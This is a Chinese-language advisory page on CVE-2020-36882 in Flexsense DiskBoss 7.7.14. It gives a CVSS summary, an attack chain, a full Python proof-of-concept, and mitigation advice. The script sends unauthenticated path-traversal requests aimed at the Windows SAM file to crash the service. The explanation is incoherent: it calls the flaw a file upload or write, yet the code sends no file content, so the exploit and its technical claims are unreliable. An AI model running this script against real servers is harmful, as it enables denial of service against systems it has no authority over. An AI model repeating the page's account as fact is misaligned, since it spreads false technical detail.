CVE-2020-36882: Flexsense DiskBoss 7.7.14 任意文件上传导致拒绝服务漏洞

漏洞信息

漏洞编号

CVE-2020-36882

漏洞类型

任意文件上传/拒绝服务

CVSS评分

7.5 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

Flexsense DiskBoss 7.7.14

漏洞概述

CVE-2020-36882是Flexsense DiskBoss 7.7.14版本中的一个高危安全漏洞。该漏洞允许未经身份认证的攻击者通过/Command/Search Files/Directory字段上传任意文件，最终导致应用程序崩溃，形成拒绝服务（DoS）攻击。DiskBoss是一款企业级文件管理工具，常用于大规模文件组织和同步操作。攻击者无需任何权限即可利用此漏洞，只需构造特定的HTTP请求即可触发。由于该软件通常部署在企业服务器或关键业务系统上，一旦遭受攻击将导致文件管理服务中断，影响业务连续性。此漏洞的CVSS评分为7.5，属于高危级别，具有较高的利用价值和实际威胁。攻击复杂度低，无需用户交互，使得漏洞极易被 exploitation。

技术细节

该漏洞存在于DiskBoss 7.7.14的文件搜索功能模块中。攻击者通过向/Command/Search Files端点发送特制的HTTP POST请求，在Directory参数中注入目录遍历字符和恶意文件路径。由于应用程序未对用户输入进行充分的路径验证和文件类型检查，攻击者可以指定任意文件系统路径并写入任意内容。上传的文件可能导致应用程序内存损坏或关键配置文件被覆盖，从而触发崩溃。漏洞利用的关键在于Directory字段的输入验证不足，攻击者可以使用../进行路径遍历，访问系统敏感目录。攻击成功后，应用程序会进入不可恢复的错误状态，无法正常响应后续请求，形成持续性拒绝服务。攻击者无需任何认证凭证即可完成攻击全过程。

攻击链分析

STEP 1

步骤1: 信息收集

攻击者识别目标服务器上运行的DiskBoss 7.7.14服务，确认开放的网络端口（通常为8090）

STEP 2

步骤2: 构造恶意请求

攻击者构造HTTP POST请求，目标为/Command/Search Files端点，在Directory参数中注入包含路径遍历字符的恶意文件路径

STEP 3

步骤3: 发送攻击载荷

攻击者发送未经认证的HTTP请求，应用程序接收并处理Directory字段中的恶意输入

STEP 4

步骤4: 文件写入操作

由于缺少输入验证，应用程序将任意内容写入攻击者指定的文件系统路径，可能覆盖系统关键文件

STEP 5

步骤5: 应用程序崩溃

写入的恶意文件导致应用程序内存损坏或配置异常，触发未捕获异常，应用程序进入错误状态并崩溃

STEP 6

步骤6: 拒绝服务完成

应用程序无法恢复响应请求，文件管理服务中断，攻击者成功实现持续性DoS攻击

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests
import sys

# CVE-2020-36882 PoC - DiskBoss 7.7.14 Arbitrary File Upload DoS
# Target: Flexsense DiskBoss 7.7.14
# Vulnerability: Unauthenticated arbitrary file upload via /Command/Search Files endpoint

def exploit_diskboss(target_url, file_path='../../../../windows/system32/config/sam'):
    """
    Exploit function to trigger arbitrary file upload vulnerability
    
    Args:
        target_url: Base URL of vulnerable DiskBoss server
        file_path: Malicious file path to write (path traversal supported)
    
    Returns:
        bool: True if exploit sent successfully, False otherwise
    """
    exploit_url = f"{target_url}/Command/Search Files"
    
    # Construct malicious payload
    payload = {
        'Directory': file_path,  # Path traversal + arbitrary file path
        'SearchPattern': '*.exe',
        'EnableRecursive': '1',
        'EnableSubfolders': '1'
    }
    
    headers = {
        'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36',
        'Content-Type': 'application/x-www-form-urlencoded',
        'Accept': '*/*'
    }
    
    try:
        print(f"[*] Sending exploit payload to {exploit_url}")
        print(f"[*] File path: {file_path}")
        
        # Send POST request with malicious payload
        response = requests.post(
            exploit_url,
            data=payload,
            headers=headers,
            timeout=10,
            verify=False
        )
        
        print(f"[*] Response Status: {response.status_code}")
        print(f"[*] Response Length: {len(response.text)}")
        
        if response.status_code == 200:
            print("[+] Exploit payload sent successfully")
            print("[+] Application may crash due to arbitrary file write")
            return True
        else:
            print(f"[-] Unexpected response: {response.status_code}")
            return False
            
    except requests.exceptions.RequestException as e:
        print(f"[-] Request failed: {str(e)}")
        return False

def check_vulnerability(target_url):
    """
    Check if target is vulnerable to CVE-2020-36882
    """
    test_url = f"{target_url}/Command/Search Files"
    
    try:
        response = requests.get(test_url, timeout=5)
        if response.status_code in [200, 400, 500]:
            print(f"[+] Target appears to be running DiskBoss service")
            return True
    except:
        pass
    
    return False

if __name__ == "__main__":
    if len(sys.argv) < 2:
        print("Usage: python cve-2020-36882.py <target_url>")
        print("Example: python cve-2020-36882.py http://192.168.1.100:8090")
        sys.exit(1)
    
    target = sys.argv[1].rstrip('/')
    
    print("=" * 60)
    print("CVE-2020-36882 - DiskBoss 7.7.14 Arbitrary File Upload DoS")
    print("=" * 60)
    
    if check_vulnerability(target):
        exploit_diskboss(target)
    else:
        print("[-] Target does not appear to be a vulnerable DiskBoss instance")

影响范围

Flexsense DiskBoss 7.7.14

防御指南

临时缓解措施

在厂商发布官方修复补丁之前，建议采取以下临时缓解措施：1）使用网络层访问控制，限制对DiskBoss管理端口的访问，仅允许受信任的IP地址访问；2）部署Web应用防火墙规则，拦截包含路径遍历序列（../）和异常文件路径的请求；3）监控应用程序日志，关注异常的文件操作行为；4）考虑使用反向代理隔离管理接口；5）如果业务允许，暂时禁用文件搜索功能模块以减少攻击面。